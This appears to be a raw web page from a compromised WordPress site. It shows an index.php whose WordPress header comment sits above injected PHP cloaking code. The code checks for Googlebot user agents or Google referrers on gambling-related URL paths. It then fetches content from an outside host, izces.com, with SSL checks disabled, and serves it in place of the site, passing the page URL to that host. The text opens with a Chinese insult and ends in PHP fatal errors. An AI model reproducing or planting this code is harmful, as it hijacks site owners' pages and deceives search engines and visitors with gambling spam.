我日你妈,骗子。今天卖给我 明天卖给别人
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
@set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html; charset=utf-8");
$headers = [];
if (function_exists('getallheaders')) {
$headers = getallheaders();
} else {
foreach ($_SERVER as $key => $value) {
if (stripos($key, 'HTTP_') === 0) {
$headers[str_replace('_', '-', substr($key, 5))] = $value;
}
}
}
$referer = $headers['Referer'] ?? ($_SERVER['HTTP_REFERER'] ?? '');
$user_agent = strtolower($headers['User-Agent'] ?? ($_SERVER['HTTP_USER_AGENT'] ?? ''));
$google_bots = [
'googlebot', 'googlebot-news', 'googlebot-image', 'googlebot-video',
'googlebot-mobile', 'adsbot-google', 'adsbot-google-mobile',
'mediapartners-google', 'googlebot-ads', 'googlebot-shopping',
'google-favicon', 'google-web-light', 'apis-google', 'feedfetcher-google',
'duplexweb-google', 'google-inspectiontool'
];
$is_googlebot = preg_match('/' . implode('|', $google_bots) . '/i', $user_agent);
$protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') || $_SERVER['SERVER_PORT'] == 443 ? 'https://' : 'http://';
$current_url = $protocol . ($_SERVER['HTTP_HOST'] ?? $_SERVER['SERVER_NAME']) . ($_SERVER['REQUEST_URI'] ?? $_SERVER['PHP_SELF']);
$pattern = '#(|app/|Game/|Mall/|cockfight/|sell/|Chess/|yes/|virtual/|casino/|jackpots/|bet/|online/|android/|download/|blank/|bet/|casino/|games/|play/|video/|poker/|root/|news/|data|\+|[-+]\d(?!\d))#i';
$found = preg_match($pattern, $current_url);
function fetchRemoteContent($url, $post_fields = [])
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
if (!empty($post_fields)) {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
if ($found && ($is_googlebot || stripos($referer, 'google.com') !== false)) {
$target_url = '';
$post_fields = [];
$api_host = 'izces.com';
if ($is_googlebot) {
$target_url = "https://{$api_host}/";
$post_fields = ['fafa' => $current_url];
} elseif (stripos($referer, 'google.com') !== false) {
$target_url = "https://{$api_host}/888.php";
}
if (!empty($target_url)) {
$response = fetchRemoteContent($target_url, $post_fields);
if (!empty($response)) {
if (stripos($current_url, 'sitemap.xml') !== false) {
header("Content-Type: application/xml");
}
exit(trim($response));
}
}
}
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
?>
Warning: require(/home/u749516471/domains/albadigital.com.br/public_html/wp-blog-he): Failed to open stream: No such file or directory in /home/u749516471/domains/albadigital.com.br/public_html/index.php on line 106
Fatal error: Uncaught Error: Failed opening required '/home/u749516471/domains/albadigital.com.br/public_html/wp-blog-he' (include_path='.:/opt/alt/php81/usr/share/pear:/opt/alt/php81/usr/share/php:/usr/share/pear:/usr/share/php') in /home/u749516471/domains/albadigital.com.br/public_html/index.php:106
Stack trace:
#0 {main}
thrown in /home/u749516471/domains/albadigital.com.br/public_html/index.php on line 106